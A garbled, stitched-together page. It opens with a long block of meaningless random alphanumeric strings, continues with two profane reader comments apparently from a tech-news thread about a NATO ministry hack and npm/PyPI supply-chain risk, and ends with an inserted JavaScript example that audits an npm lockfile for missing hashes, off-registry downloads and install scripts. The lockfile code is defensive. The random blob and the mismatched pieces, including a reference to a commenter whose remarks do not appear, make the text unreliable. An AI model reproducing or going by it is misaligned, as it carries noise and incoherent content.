    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

    87YtCPiBK1kVAtYnsbo3mt8bMVYN

    *

  11. Tom Paine

    Old man talking, gather round

    Apart from refs to agile, Rust and so on, every comment above could have been found on a bug-related Reg story 20 years ago.

    The attack marks the first occasion that a NATO country's defence ministry has fallen victim to the flaws.

    Yeah, well, that’s just your opinion, man. And “...as far as we know”.

    ION,

    NATO have been pwned many, many times before. (Hint: NATO is not, *itself*, a military org. No, really, it’s not. Surprised me, too.)

  12. Abominator

    Everybody : Can this be possibly any worse?

    NPM : Hold my beer.....

    JavaScript, and the way it's distributed, with people able to remove infrastructure with no notice and also people able to upload malicious infrastructure into your ecosystem, should scare the bejesus out of everybody. But move fast and break things they said. The web is the future...where you let anyone or anything into your home without knowing.

    Same goes for Python and PIP and the rest of the shitty fucking web repos that everyone relies on. It's like a giant attack vector into your system, but all through HTTP and HTTPS, which can't be bad, right? We block every port, but then just proxy everything through the fucking web ports as they can't be evil, right?

    It's like people have learned nothing. You know how like half the web was built on OpenSSL, which was a steaming pile of shit. Well, wait until the horrors of Web 2.0 get realised and your fucking Internet-enabled fridge or oven tries to kill you.
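The two worries raised above, Hans_1's "800 dependencies you have to make sure are safe" and Abominator's point about packages being yanked or replaced in the registry, both come down to what an install is actually allowed to fetch and run. The following is an added example (written for this page, not code from any of the commenters or from npm) of the lockfile checks a defender can run before trusting an install: it walks the `packages` map of an npm lockfile (v2/v3 format), counts the transitive dependencies, and flags any entry that lacks an `integrity` hash, resolves to a host other than the expected registry, or carries `hasInstallScript` (the field npm writes when a package has install-time scripts). The lockfile contents and package names below are constructed for the example; `EXPECTED_REGISTRY` is an assumed setting you would match to your own mirror.

```javascript
// Added example, not from the comment thread: audit an npm lockfile before
// an install is trusted. Field names (packages, version, resolved, integrity,
// hasInstallScript) are the ones npm writes in lockfile v2/v3.

// Assumed: the registry every tarball is expected to come from.
const EXPECTED_REGISTRY = "https://registry.npmjs.org/";

// Constructed sample lockfile: one clean dependency, one missing its
// integrity hash, one fetched from an unexpected host, one with install scripts.
const SAMPLE_LOCK = {
  name: "sample-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "sample-app", version: "1.0.0" }, // the project itself
    "node_modules/sample-pad": {
      version: "1.3.0",
      resolved: "https://registry.npmjs.org/sample-pad/-/sample-pad-1.3.0.tgz",
      integrity: "sha512-CONSTRUCTEDnotARealHash1==",
    },
    "node_modules/sample-util": {
      version: "2.0.1",
      resolved: "https://registry.npmjs.org/sample-util/-/sample-util-2.0.1.tgz",
      // no integrity field: npm cannot verify the tarball it downloads
    },
    "node_modules/sample-mirrored": {
      version: "0.1.0",
      resolved: "https://mirror.example.invalid/sample-mirrored-0.1.0.tgz",
      integrity: "sha512-CONSTRUCTEDnotARealHash2==",
    },
    "node_modules/sample-native": {
      version: "3.4.5",
      resolved: "https://registry.npmjs.org/sample-native/-/sample-native-3.4.5.tgz",
      integrity: "sha512-CONSTRUCTEDnotARealHash3==",
      hasInstallScript: true, // preinstall/install/postinstall will run
    },
  },
};

// Walk the lockfile and return the dependency count plus a list of findings.
function auditLockfile(lock, expectedRegistry = EXPECTED_REGISTRY) {
  const findings = [];
  const pkgs = lock.packages || {};
  let dependencyCount = 0;
  for (const [path, entry] of Object.entries(pkgs)) {
    if (path === "") continue; // root project entry, not a dependency
    dependencyCount += 1;
    // Nested paths look like node_modules/a/node_modules/b; keep the leaf name.
    const name = path.replace(/^.*node_modules\//, "");
    if (!entry.integrity) {
      findings.push({ name, issue: "missing integrity hash" });
    }
    if (!entry.resolved) {
      findings.push({ name, issue: "missing resolved URL" });
    } else if (!entry.resolved.startsWith(expectedRegistry)) {
      findings.push({ name, issue: `resolved outside expected registry: ${entry.resolved}` });
    }
    if (entry.hasInstallScript) {
      findings.push({ name, issue: "runs install-time scripts" });
    }
  }
  return { dependencyCount, findings };
}

// Run against the constructed sample; for a real project, pass
// JSON.parse(<contents of package-lock.json>) instead.
const SAMPLE_REPORT = auditLockfile(SAMPLE_LOCK);
console.log(`${SAMPLE_REPORT.dependencyCount} dependencies, ${SAMPLE_REPORT.findings.length} findings`);
for (const f of SAMPLE_REPORT.findings) {
  console.log(`- ${f.name}: ${f.issue}`);
}
```

Pair this with `npm ci` (which refuses to install when the lockfile and package.json disagree) and `--ignore-scripts` for packages you have not reviewed; the audit only tells you what the lockfile would let npm fetch and execute, it does not make the 800 packages safe.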
